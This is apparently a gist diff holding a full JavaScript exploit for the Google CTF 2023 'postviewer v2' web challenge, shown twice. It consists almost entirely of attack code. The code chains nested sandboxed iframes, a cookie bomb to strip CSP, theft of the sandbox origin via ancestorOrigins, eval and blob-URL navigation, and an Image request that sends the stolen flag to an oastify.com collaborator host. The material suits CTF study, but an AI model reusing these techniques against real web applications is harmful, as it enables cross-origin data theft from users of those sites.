tyage · June 25, 2023 18:26
diff --git a/postviewer_v2.html b/postviewer_v2.html
 <body>
 <script>
 const sleep = (time) => new Promise((resolve) => setTimeout(resolve, time))
 const frame = document.createElement('iframe');
 frame.src = `https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/shim.html?o=${encodeURIComponent(location.origin)}`;
 document.body.appendChild(frame);

 const frame2 = document.createElement('iframe');
 frame2.src = `https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/shim.html?o=${encodeURIComponent(location.origin)}`;
 frame2.setAttribute('sandbox', 'allow-downloads allow-downloads-without-user-activation allow-forms allow-modals allow-orientation-lock allow-pointer-lock allow-popups allow-popups-to-escape-sandbox allow-presentation allow-same-origin allow-scripts allow-storage-access-by-user-activation allow-top-navigation allow-top-navigation-to-custom-protocols')
 document.body.appendChild(frame2);

 // steal flag from same-origin frame
 const sendFlag = btoa(`<script>
 blob = top.frames[0].frames[0].window.document.querySelector('iframe').src
 myReader = new FileReader();
 myReader.addEventListener("loadend", function(e){
  (new Image()).src = 'https://tsp665uzl4quuj5mxsxzkr72vt1kped3.oastify.com/?flag=' + e.srcElement.result
 });
 fetch(blob).then(r => r.blob()).then(c => myReader.readAsText(c))
 <\/script>`)

 // steal random origin name
 const originStealer = btoa(`<script>
 top.postMessage(location.ancestorOrigins[0], '*');
 history.back();
 <\/script>`)

 // after we get the iframe of postviewer
 const finalPayload = btoa(`
 <iframe src="https://postviewer2-web.2023.ctfcompetition.com/#file-87ebbc317d687eeff47403603cc6dfb9b7d6c817"></iframe>
 <script>
 // after we get the random origin name
 window.addEventListener('message', (e) => {
  const origin = e.data
  frame = document.createElement('iframe');
  frame.src = origin + '/shim.html?o=' + encodeURIComponent(location.origin);
  document.body.appendChild(frame);
  setTimeout(() => {
    frame.contentWindow.postMessage({
      body: atob('${sendFlag}'),
      mimeType: 'text/html',
      sandbox: 'allow-downloads allow-downloads-without-user-activation allow-forms allow-modals allow-orientation-lock allow-pointer-lock allow-popups allow-popups-to-escape-sandbox allow-presentation allow-same-origin allow-scripts allow-storage-access-by-user-activation allow-top-navigation allow-top-navigation-to-custom-protocols allow-same-origin allow-same-origin'.split(' ')
    },'*')
  }, 500)
 })

 const attack = () => {
  if (frames[0].frames.length === 0 || frames[0].frames[0].length === 0) {
    setTimeout(attack, 10)
    return;
  }

  // run origin stealer
  setTimeout(() => {
    frames[0].frames[0].frames[0].location = URL.createObjectURL(new Blob([atob('${originStealer}')],{type:'text/html'}))
  }, 500)
 }
 attack()
 <\/script>
 `)

 const main = async () => {
  await sleep(1000)
  // run script on frame1
  frame.contentWindow.postMessage({
    body: `<script>
 const sleep = (time) => new Promise((resolve) => setTimeout(resolve, time))

 const main = async () => {
  // cookie bomb on frame2 and disables CSP
  for (let i = 0; i<50; ++i) parent.document.cookie='a'+i+'='+'a'.repeat(4000)+'; SameSite=None; Secure;'

  await sleep(500)

  parent.eval("parent.frames[1].location='https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/'")

  await sleep(500)

  // move top location to sbx-hoge with no CSP context
  frame2 = parent.parent.frames[1]
  frame2.history.replaceState=1
  for (let i = 0; i<50; ++i) frame2.document.cookie='a'+i+'=deleted; expires=Thu, 01 Jan 1970 00:00:00 GMT'
  frame2.eval(\`
 blob = new Blob([atob(\\\`${finalPayload}\\\`)], {
  type: 'text/html'
 });
 parent.location.replace(URL.createObjectURL(blob));
 \`)

 }
 main()
 <\/script>`,
    mimeType: 'text/html',
    sandbox: 'allow-downloads allow-downloads-without-user-activation allow-forms allow-modals allow-orientation-lock allow-pointer-lock allow-popups allow-popups-to-escape-sandbox allow-presentation allow-same-origin allow-scripts allow-storage-access-by-user-activation allow-top-navigation allow-top-navigation-to-custom-protocols allow-same-origin allow-same-origin'.split(' ')
  },'*')
 }
 main()
 </script>
 </body>
	<body>
	<script>
	const sleep = (time) => new Promise((resolve) => setTimeout(resolve, time))
	const frame = document.createElement('iframe');
	frame.src = `https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/shim.html?o=${encodeURIComponent(location.origin)}`;
	document.body.appendChild(frame);

	const frame2 = document.createElement('iframe');
	frame2.src = `https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/shim.html?o=${encodeURIComponent(location.origin)}`;
	frame2.setAttribute('sandbox', 'allow-downloads allow-downloads-without-user-activation allow-forms allow-modals allow-orientation-lock allow-pointer-lock allow-popups allow-popups-to-escape-sandbox allow-presentation allow-same-origin allow-scripts allow-storage-access-by-user-activation allow-top-navigation allow-top-navigation-to-custom-protocols')
	document.body.appendChild(frame2);

	// steal flag from same-origin frame
	const sendFlag = btoa(`<script>
	blob = top.frames[0].frames[0].window.document.querySelector('iframe').src
	myReader = new FileReader();
	myReader.addEventListener("loadend", function(e){
	(new Image()).src = 'https://tsp665uzl4quuj5mxsxzkr72vt1kped3.oastify.com/?flag=' + e.srcElement.result
	});
	fetch(blob).then(r => r.blob()).then(c => myReader.readAsText(c))
	<\/script>`)

	// steal random origin name
	const originStealer = btoa(`<script>
	top.postMessage(location.ancestorOrigins[0], '*');
	history.back();
	<\/script>`)

	// after we get the iframe of postviewer
	const finalPayload = btoa(`
	<iframe src="https://postviewer2-web.2023.ctfcompetition.com/#file-87ebbc317d687eeff47403603cc6dfb9b7d6c817"></iframe>
	<script>
	// after we get the random origin name
	window.addEventListener('message', (e) => {
	const origin = e.data
	frame = document.createElement('iframe');
	frame.src = origin + '/shim.html?o=' + encodeURIComponent(location.origin);
	document.body.appendChild(frame);
	setTimeout(() => {
	frame.contentWindow.postMessage({
	body: atob('${sendFlag}'),
	mimeType: 'text/html',
	sandbox: 'allow-downloads allow-downloads-without-user-activation allow-forms allow-modals allow-orientation-lock allow-pointer-lock allow-popups allow-popups-to-escape-sandbox allow-presentation allow-same-origin allow-scripts allow-storage-access-by-user-activation allow-top-navigation allow-top-navigation-to-custom-protocols allow-same-origin allow-same-origin'.split(' ')
	},'*')
	}, 500)
	})

	const attack = () => {
	if (frames[0].frames.length === 0 \|\| frames[0].frames[0].length === 0) {
	setTimeout(attack, 10)
	return;
	}

	// run origin stealer
	setTimeout(() => {
	frames[0].frames[0].frames[0].location = URL.createObjectURL(new Blob([atob('${originStealer}')],{type:'text/html'}))
	}, 500)
	}
	attack()
	<\/script>
	`)

	const main = async () => {
	await sleep(1000)
	// run script on frame1
	frame.contentWindow.postMessage({
	body: `<script>
	const sleep = (time) => new Promise((resolve) => setTimeout(resolve, time))

	const main = async () => {
	// cookie bomb on frame2 and disables CSP
	for (let i = 0; i<50; ++i) parent.document.cookie='a'+i+'='+'a'.repeat(4000)+'; SameSite=None; Secure;'

	await sleep(500)

	parent.eval("parent.frames[1].location='https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/'")

	await sleep(500)

	// move top location to sbx-hoge with no CSP context
	frame2 = parent.parent.frames[1]
	frame2.history.replaceState=1
	for (let i = 0; i<50; ++i) frame2.document.cookie='a'+i+'=deleted; expires=Thu, 01 Jan 1970 00:00:00 GMT'
	frame2.eval(\`
	blob = new Blob([atob(\\\`${finalPayload}\\\`)], {
	type: 'text/html'
	});
	parent.location.replace(URL.createObjectURL(blob));
	\`)

	}
	main()
	<\/script>`,
	mimeType: 'text/html',
	sandbox: 'allow-downloads allow-downloads-without-user-activation allow-forms allow-modals allow-orientation-lock allow-pointer-lock allow-popups allow-popups-to-escape-sandbox allow-presentation allow-same-origin allow-scripts allow-storage-access-by-user-activation allow-top-navigation allow-top-navigation-to-custom-protocols allow-same-origin allow-same-origin'.split(' ')
	},'*')
	}
	main()
	</script>
	</body>